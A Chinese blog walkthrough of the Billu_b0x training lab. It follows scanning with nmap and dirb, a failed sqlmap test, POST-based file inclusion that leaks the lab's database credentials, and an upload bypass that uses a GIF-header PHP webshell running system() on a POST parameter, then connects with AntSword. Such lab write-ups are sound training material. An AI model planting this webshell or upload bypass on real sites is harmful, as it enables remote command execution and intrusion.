Billu_b0x靶场:一场关于网络安全的技术冒险

原创 已于 2025-03-18 20:29:19 修改 · 405 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全 #Billu_b0x靶场

于 2025-03-18 20:28:51 首次发布

1.下载该靶场,并在虚拟机开启,确保网络适配器是NAT网段的

2.借助kali来确定该靶机的IP地址

nmap -O 192.168.139.1/24

3.访问该IP地址

4.尝试访问一下robots.txt,什么也没有

5.接下来来到kali里面扫目录

dirb http://192.168.139.168

6.首先访问add目录,发现文件上传

7.接下来依次访问目录

8.在192.168.139.168/in下查找发现网站绝对路径

9.使用sqlmap来进行爆破看是否存在注入

10.用sqlmap来扫这个数据包,发现不存在注入

11.文件包含漏洞利用,使用GET传递参数失败,使用POST传参成功

12.访问c.php,发现数据库的账号和密码为billu:b0x_billu

mysqli_connect(host,username,password,dbname,port,socket);

13.回到数据库登录页面进行登录

14.查找有用信息发现了用户名和密码

15.然后在首页进行登录账号和密码为biLLu:hEx_it,发现可以进行文件上传

16.上传php文件查看,发现上传失败,只能上传图片文件

上传图片马,上传成功

GIF89a
<?php @system($_POST['AAA'])?>

17.进行传参

18.用蚁剑进行连接,就可以连接成功

billu_b0x靶场通关
tpaer的博客
03-03 957
billu_box靶场通关
VulnHub靶场渗透实战11-Billu_b0x
随心所欲不逾矩
07-31 2726
VulnHub靶场渗透实战11-Billu_b0x
Billu_b0x靶场渗透测试
qq_41567985的博客
11-05 281
总结一下今天的打靶,这个靶场有很多漏洞可以利用,但是我也只是利用了一两个,中间反弹shell那里花了挺多时间的,但是也有提升,让我学到了很多种反弹shell的方法!使用了很多提权命令都不是很行,也在里面使用了wget发现还是不行,后面才查到没有权限需要去/tmp目录下。确实啊,tmp目录本来就容易被忽视,777的权限,这个应该要好好的完善一下权限才行。把限免load改成上传的php文件改成jpg文件之后的名字-send-并且反弹成功。始终反弹不成功,按照网上的方法也都试了试,还是不成功,不是很明白。
红队Billu_b0x靶场讲解
qq_52732967的博客
06-26 660
红队Billu_b0x靶场讲解。
VulnHub 靶场实战~Billu_b0x
海鸥先生的博客
02-26 1368
billu_b0x靶场难度:适中;感觉很多东西还没掌握,后期继续完善!
Billu_b0x靶场复现
蘇同学的安全屋的博客
04-29 622
Billu_b0x靶场复现 环境准备: Billu_b0x,VMware虚拟机设置为nat模式,靶机自动获取ip地址 kali linux 2020虚拟机,ip地址192.168.120.133 kali linux 2020虚拟机,ip地址192.168.120.141 1.信息收集 nmap -sP 192.168.1.0/24 使用nmap扫描本网段主机,其中192.168.120.1为网卡地址,192.168.120.2为网关,133为本机地址,目标靶机ip为192.168.1.141 主机发现
Vulnhub靶机 Billu_b0x(渗透测试详解)
2301_78721909的博客
08-06 578
Vulnhub靶机 Billu_b0x(渗透测试)
vulhub/Billu_b0x靶机----练习攻略
qq_65379983的博客
03-18 1190
Billu_b0x靶机攻略 文件上传漏洞 巧用蚁剑参数,构建请求包数据进行连接
【VulnHub】billu_b0x靶场复盘
redwand的博客
01-21 4830
此题目主要训练三方面要点,一是post方法下的文件包含,二是post方法下的getshell,三是[CVE-2015-1328]的利用。很多细节不错,值得入手一练。
VnlnHub Billu_b0x
weixin_45682839的博客
10-09 521
涉及知识包括:端口服务探测、敏感目录收集、SQL注入、文件上传漏洞、任意文件包含漏洞、linux本地提权、任意文件下载漏洞、敏感信息收集等。
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
Billu_b0x的渗透测试
Cper的博客
10-26 694
靶场的测试实践和不同思路
web安全开发,在线%简易版web渗透扫描器%系统,基于Idea,html,css,uniapp,jsp,java,ssm,maven,mysql
Strategic__的博客
08-12 529
这位某安朋友应该还没入门,基本的webtop10(owasp)漏洞如何检测还没掌握,虽然现在有现成工具来进行web漏洞检测,但是原理咱们还是要知道,因为后期咱们实战中遇到大部分都带waf,waf就算了关键waf还带着自主学习的功能,之前就遇好几家带人工智能的waf防火墙哈哈哈。代码原理咱们理解以后聊聊这几个漏洞,xss分三大类,反射,存储dom(其他扩展flask,pdf,uxss),怎么判断xss,最简单方式看下web提交参数会不会在网页显示,如果有咱们直接上payload测试就行。需要定制可以联系哦。
美创智能数据安全分类分级平台获“2025年网络安全优秀创新成果大赛”优胜奖!
美创科技的博客
08-14 411
美创智能数据安全分类分级平台,基于 AI 智能化技术,通过动态发现并精准识别对国家、组织和个人安全至关重要的各类分级数据,构建起高度贴合行业诉求的数据资产目录,有效满足数据安全合规及精细化安全防护的需求,其分类分级准确率更高达95%。平台全新上线「智能自检」功能,基于双 AI 模型协同校验机制,直击传统分类分级作业中人工复核效率低、分类分级质量难保证的痛点,让分类分级效率飙升至行业新高,更以逼近100%的精准率,让每一条数据的分级结果都经得起监管与业务的双重检验。
网络安全应急响应
鹿鸣天涯
08-14 1003
logs/catalina.xx.log logs/host-manager.xx.log logs/localhost.xx.log logs/manager.xx.log 主要记录系统启、关闭日志、管理日志和异常信息。1)收集信息:操作系统版本,补丁,数据库版本,中间件/服务器,网络拓扑,受害范围,处置情况,提取日志(主机,安全设备,数据库等)1、web入侵:挂马、网页篡改(博彩/黑帽SEO等)、植入webshell,黑页,暗链等。入侵现象:如cpu过高,勒索界面,异常网络链接,安全设备告警等。
网络的基本概念、通信原理以及网络安全问题
qq_73704268的博客
08-11 706
本文系统介绍了计算机网络的基础原理与安全机制。主要内容包括:1.网络本质是电压/电磁波信号传输,通过高低电平表示0/1数字信号;2.网络架构采用分层交换结构,家庭-交换机-核心交换机构成树状拓扑;3.网络通信依赖IP地址、MAC地址和端口号三重标识,通过校验码、超时重传等机制保障传输可靠性;4.网络协议作为通信规则,采用分层设计保证设备互联,但协议开放性带来安全风险;5.常见网络攻击包括监听、篡改、拦截和复制,其中协议层漏洞可能导致严重安全问题。文章重点分析了网络监听的技术原理和安全威胁,指出硬件层难以实现
医院网络安全重保方案
huluang的专栏
08-15 497
医院网络安全重保方案严格遵循《网络安全法》等国家标准,重点防护勒索软件和供应链攻击。方案构建基于零信任架构的动态防护体系,包括终端EDR防护、数据加密备份、网络分区隔离等措施,确保核心医疗系统RTO≤4小时。实施过程涵盖资产梳理、渗透测试、7×24小时监测等环节,并配套完善的交付文档体系。方案特别强调患者数据保护,要求数据库审计日志留存≥6个月,符合《个人信息保护法》要求。通过厂商驻场、应急演练等技术保障措施,实现攻击阻断率≥99%,全面满足三级等保要求,保障医院业务连续性。
网络安全和基础设施安全局 (CISA) 表示微分段不再是可选的
网络研究观
08-13 816
通过分阶段的方法和合适的工具,组织现在就可以踏上一条清晰的道路,迈向全面、有效的零信任环境。
Android 欧盟网络安全EN18031 要求对应的基本表格填写
最新发布
wenzhi的博客
08-15 856
摘要:本文介绍了欧盟网络安全标准EN 18031的相关背景及认证要求。该标准将于2025年8月1日正式实施,不符合要求的产品将无法进入欧盟市场。文章重点展示了一个EN 18031认证预填表格的示例,包含访问控制机制(ACM)和认证机制(AUM)两个核心模块的评估项,如设备是否实施访问控制措施、采用何种认证方式等。表格采用"是/否/不适用"的勾选形式,并设有备注栏说明具体情况。对于厂商而言,通过专业机构认证是确认设备合规性的有效途径。
入门靶场Billu_b0x:Web渗透学习与实践
"Billu_b0x靶机练习是一个适合初学者的Web渗透入门实践,旨在帮助用户了解基本的Web渗透流程。通过该靶场,用户可以锻炼自己的技能,包括主机发现、端口扫描和信息收集等。文章作者作为小白,分享了其学习过程中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

执念WRD

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值